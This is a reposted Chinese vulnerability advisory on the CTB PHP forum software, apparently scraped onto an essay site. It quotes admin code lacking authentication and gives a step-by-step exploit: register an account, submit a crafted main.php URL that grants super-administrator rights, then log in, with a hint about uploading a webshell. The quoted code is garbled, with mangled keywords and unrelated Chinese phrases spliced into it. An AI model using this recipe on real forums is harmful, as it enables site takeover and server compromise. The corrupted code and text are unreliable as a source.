首页 > 作文

漂亮但不安全的CTB

更新时间:2023-04-06 07:52:37 阅读: 评论:0

>>>dedicatedthisscraptocaojing<<<

涉及版本:

^^^^^^^

目前所有版本(现在1.3alpha为最高版本)

描述:

^^^^^^

ctb是一款由实易数码<11cn.org>;开发和维护的源代码开放的php论坛。由于其后台管理文件验证存在缺陷,可能导致非法用户直接添加论坛超级管理员,进而威胁论坛或服务器安全。

具体:

^^^^

ctb书写非常规范,代码井然有序,赏心悦目,的确是优美的程序;特别是其功能模块,着实让小弟学习了一把。但安全方面却令人堪忧:

试看如下代码:

/admin/main.php

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

//获取get变量

if(is_array($_get)){

foreach($_getas$k=>$v){

if(is_array($_get[$k])){

foreach($_get[$k]as$k2=>$v2){

$return[$k][$k2]=$v2;

}

}el{

$return[$k]=$v;

}

}

}



$mod=ist($_get[‘mod’])?$_get[‘mod’]:$_post[‘mod’];

if(!file_exists($mod.”.php”{

$mod=“mainright”;

}

require_once($mod.”.php”;

//—————&教师节老师祝福语#8212;———————————————————–

//初始化类变量

$ctb=newmodule;

$ctb->t=$t;

$ctb->tplpath=“./templates”;

$ctb->input=$return;

$ctb->ss=ist($_cookie[“ss_adminname”])?$_cookie:$_ssion;

$ctb->execute();

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

这里没有任何验证,我们看看添加管理员的文件:

/admin/systemur.php

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

classmoduleextendscommonclass

//系统管理模块子类

{

functionexecute(){

switch($this->input[‘action’]){



ca‘addsystemur’:

$this->addsystemur();

break;



门面房租赁合同范本}

}

functionaddsystemur()

{

//输入数据简单格式化

$this->inputcheck(“main.php?mod=systemur&action=showsystemur”;

//执行添加操作

$this->file=“../”.$this->t[datapath].”/urs/list.php”;

$systemline=$this->lect(4,$this->inpu无穷动评价t[‘systemurn统招全日制本科ame’]);

….

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~梁博 我是歌手~~~~~~~~~~~~~

依然没有验证,一路顺利啊!

利用方法:

^^^^^^^

先注册一个用户:

登陆id:cat

用户名:dog

密码:ilikecat

重复密码:ilikecat

信箱:cat@dog.com

接着提交如下url:

http://www.target.com/ctb/admin/main.php?mod=systemur&systemurname=dog&systemurmode=1&action=addsystemur

哈哈,你现在已经是超级管理员了,不相信?提交如下url后台登陆:

/d/file/titlepic/main.php

管理名称:cat

管理密码:ilikecat

咦…还真成功了!

你现在是不是想更改后台上传文件类型,然后uploadwebshell?哼,被我猜到了吧…

后记:另外发现ctb代码注释有些扎眼的错别字,大煞风景,希望可以一起修正。

本文发布于:2023-04-06 07:52:18,感谢您对本站的认可!

本文链接:https://www.wtabcd.cn/fanwen/zuowen/d9a8c8a02cc091a4b9ad617dced73292.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

本文word下载地址:漂亮但不安全的CTB.doc

本文 PDF 下载地址:漂亮但不安全的CTB.pdf

下一篇:返回列表
标签:你现在   密码   版本   代码
相关文章
留言与评论(共有 0 条评论)
   
验证码:
Copyright ©2019-2022 Comsenz Inc.Powered by © 专利检索| 网站地图